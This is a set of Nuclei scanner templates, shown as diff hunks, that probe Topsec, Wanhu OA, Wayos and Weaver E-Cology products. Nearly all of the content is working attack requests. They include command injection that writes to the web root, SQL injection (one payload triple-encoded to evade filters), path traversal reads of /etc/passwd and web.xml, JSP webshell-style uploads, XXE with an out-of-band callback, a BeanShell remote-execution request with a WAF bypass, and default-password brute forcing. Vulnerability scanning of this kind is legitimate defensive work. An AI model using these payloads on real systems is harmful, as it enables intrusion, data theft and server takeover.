- https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md
tags: rce,topsec,topacm
http:
- raw:
- |
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- raw:
- |
GET /config_application.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "{{randstr}}"
- type: status
status:
- 200
# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top"

33
http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml Executable file
View File

@ -0,0 +1,33 @@
id: topsec-topapplb-arbitrary-user-login
info:
name: Topsec TopAppLB Any account Login
author: SleepingBag945
severity: critical
description: |
Any Account can log in to the background
tags: defaultaccount
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
userName=admin&password=%3Bid
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
condition: and

30
http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml Executable file
View File

@ -0,0 +1,30 @@
id: wanhu-oa-documentedit-sqli
info:
name: wanhu-oa-documentedit-sqli
author: SleepingBag945
severity: high
description: 万户Ezoffice系统是一套基于jsp的oa系统该系统基于J2EE架构技术的三层架构完全采用B/S体系结构广泛应用于各个行业。 万户ezOFFICE协同办公系统DocumentEdit.jsp存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html
tags: wanhu,oa,sqli
http:
- raw:
- |
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27caqopg%27||%27povurh%27,null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "HTTP-EQUIV=\"Pragma\""
- type: word
words:
- "caqopgpovurh"
- type: status
status:
- 200

29
http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,29 @@
id: wanhu-oa-download-ftp-arbitrary-file-read
info:
name: wanhu-oa-download-ftp-arbitrary-file-read
author: SleepingBag945
severity: high
description: 万户OA download_ftp.jsp文件存在任意文件下载漏洞攻击者通过漏洞可以下载服务器上的任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version="
- type: word
words:
- "DOCTYPE"
- type: status
status:
- 200

29
http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,29 @@
id: wanhu-oa-download-old-arbitrary-file-read
info:
name: wanhu-oa-download-old-arbitrary-file-read
author: SleepingBag945
severity: high
description: 万户OA download_old.jsp文件存在任意文件下载漏洞攻击者通过漏洞可以下载服务器上的任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version="
- type: word
words:
- "DOCTYPE"
- type: status
status:
- 200

48
http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,48 @@
id: wanhu-oa-fileupload-controller-arbitrary-file-upload
info:
name: wanhu-oa-fileupload-controller-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20fileUpload.controller%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="indh.jsp"
Content-Type: application/octet-stream
<%out.print(42285 * 41559);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
- |
GET /defaultroot/upload/html/{{filename}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: filename
internal: true
group: 1
regex:
- '"data":"(.*?)"'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
- 'status_code_2 == 200 && contains(body_2,"1757322315")'
condition: and

27
http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,27 @@
id: wanhu-oa-officeserverservlet-arbitrary-file-upload
info:
name: wanhu-oa-officeserverservlet-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA officeserverservlet 文件上传漏洞
reference:
- https://github.com/onMey/WH/blob/main/poc.py
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20OfficeServer.jsp%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/officeserverservlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "DBSTEP V3.0"
- type: status
status:
- 200

29
http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,29 @@
id: wanhu-oa-smartupload-arbitrary-file-upload
info:
name: wanhu-oa-smartupload-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA smartUpload.jsp文件存在文件上传接口且没有对文件类型进行过滤,导致任意文件上传漏洞。可直接上传恶意JSP文件。
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20smartUpload.jsp%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "请选择要上传的文件"
- type: word
words:
- "<TITLE>上传附件</TITLE>"
- type: status
status:
- 200

28
http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml Executable file
View File

@ -0,0 +1,28 @@
id: wanhu-oa-teleconferenceservice-xxe-inject
info:
name: wanhu-oa-teleconferenceservice-xxe-inject
author: SleepingBag945
severity: medium
description: 万户OA TeleConferenceService接口存在XXE注入漏洞攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html
tags: wanhu,oa,xxe
http:
- raw:
- |
POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<value>&xxe;</value>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

47
http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml Executable file
View File

@ -0,0 +1,47 @@
id: wayos-ac-weak-login
info:
name: wayos-ac weak password
author: SleepingBag945
severity: high
description: wayos weak login credentials were discovered.
reference:
- https://github.com/Ershu1/2021_Hvv/blob/main/
tags: ways-ac
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=admin&password={{ password }}&Submit=%E7%99%BB%E5%BD%95
attack: pitchfork
payloads:
password:
- admin
- 123456
- 12345678
- password
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "ac_userid=admin,ac_passwd"
condition: and
- type: word
part: body
words:
- "window.open"
- "text/javascript"
condition: and
- type: status
status:
- 200

41
http/vulnerabilities/weaver/CNVD-2023-12632.yaml Executable file
View File

@ -0,0 +1,41 @@
id: CNVD-2023-12632
info:
name: E-Cology V9 - SQL Injection
author: daffainfo
severity: high
description: |
Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
reference:
- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
- https://blog.csdn.net/qq_50854662/article/details/129992329
metadata:
max-request: 1
verified: "true"
fofa-query: app="泛微-协同商务系统"
shodan-query: 'ecology_JSessionid'
tags: cnvd,cnvd2023,ecology,sqli
# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times
http:
- raw:
- |
GET /mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'browserUrl'
- '"autoCount"'
- '"autoGet"'
condition: and
- type: status
status:
- 200

24
http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml Executable file
View File

@ -0,0 +1,24 @@
id: ecology-oa-byxml-xxe
info:
name: EcologyOA deleteUserRequestInfoByXml - XXE
author: unknown
severity: high
description: EcologyOA deleteUserRequestInfoByXml interface has XXE
tags: ecology-oa,xxe
http:
- raw:
- |
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0"?>
<!DOCTYPE>
matchers:
- type: word
words:
- 'WfData'

25
http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml Executable file
View File

@ -0,0 +1,25 @@
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
http:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:7'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=7'

45
http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml Normal file
View File

@ -0,0 +1,45 @@
id: weaver-e-bridge-linux-saveyzjfile-file-read
info:
name: weaver-e-bridge-linux-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'root:x:0')"
condition: and

45
http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml Normal file
View File

@ -0,0 +1,45 @@
id: weaver-e-bridge-windows-saveyzjfile-file-read
info:
name: weaver-e-bridge-windows-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'Program Files')"
condition: and

40
http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml Executable file
View File

@ -0,0 +1,40 @@
id: weaver-e-cology-bshservlet-rce
info:
name: Weaver E-Cology BeanShell Remote Command Execution
author: SleepingBag945
severity: critical
description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
tags: beanshell,rce,weaver
http:
- raw:
- |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=print%28%22{{randstr}}%22%29%3B
- raw:
- | # bypass waf
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
matchers-condition: and
matchers:
- type: word
words:
- "BeanShell Test Servlet"
- type: word
words:
- "{{randstr}}"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

33
http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml Executable file
View File

@ -0,0 +1,33 @@
id: weaver-e-cology-getdata-sqli
info:
name: weaver-e-cology-getdata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1759627252"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录

35
http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml Executable file
View File

@ -0,0 +1,35 @@
id: weaver-e-cology-getsqldata-sqli
info:
name: weaver-e-cology-getsqldata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"api_status":'
- '"status":true}'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

30
http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml Executable file
View File

@ -0,0 +1,30 @@
id: weaver-e-cology-hrmcarreerapplyperview-sqli
info:
name: weaver-e-cology-hrmcarreerapplyperview-sqli
author: SleepingBag945
severity: high
description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感文件
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
matchers-condition: and
matchers:
- type: word
part: body
words:
- "900150983cd24fb0d6963f7d28e17f72"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

33
http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml Executable file
View File

@ -0,0 +1,33 @@
id: weaver-e-cology-jqueryfiletree-directory-traversal
info:
name: weaver e-cology-jqueryfiletree-directory-traversal
author: SleepingBag945
severity: medium
description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: weaver,e-cology,oa
http:
- raw:
- |
GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "'index.jsp','"
- type: word
words:
- "重命名"
- type: word
words:
- "新建目录"
- type: status
status:
- 200

53
http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,53 @@
id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload
info:
name: weaver e-cology KtreeUploadAction arbitrary file upload
author: SleepingBag945
severity: critical
description: 泛微E-Cology存在文件上传漏洞攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用
reference:
- https://buaq.net/go-117479.html
tags: ecology,upload,fileupload,intrusive
http:
- raw:
- |
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
Accept-Encoding: gzip
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: filename
internal: true
group: 1
regex:
- "','url':'(.*?)','title"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'original')"
- "contains(body_2, '1841626426') && status_code_2 == 200"
condition: and
# Enhanced by md on 2022/10/31

38
http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml Executable file
View File

@ -0,0 +1,38 @@
id: weaver-e-cology-loginsso-sqli
info:
name: weaver-e-cology-loginsso-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(212943773)%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "db66c43e263be5e8c249b006b1c80792"
- type: word
negative: true
part: header
- "https://www.drupal.org"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# CNVD-2021-33202
# 蜜罐诱捕器。。

32
http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,32 @@
id: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read
info:
name: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read
author: SleepingBag945
severity: medium
description: SptmForPortalThumbnail.jsp可控的preview参数未进行过滤操作直接拼接上web根目录进行文件下载
reference:
- http://124.223.89.192/archives/e-cology8-14
tags: weaver,e-cology,oa
http:
- raw:
- |
GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
words:
- "weaver.general.BaseBean"
- type: word
words:
- "request.getParameter"
- type: status
status:
- 200

81
http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,81 @@
id: weaver-e-cology-uploadoperation-arbitrary-file-upload
info:
name: weaver e-cology uploadoperation.jsp arbitrary file upload
author: SleepingBag945
severity: critical
description: Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
http:
- raw:
- |
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
Accept-Encoding: gzip
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="secId"
1
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.jsp"
<%out.println("{{randstr_2}}");%>
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="plandetailid"
1
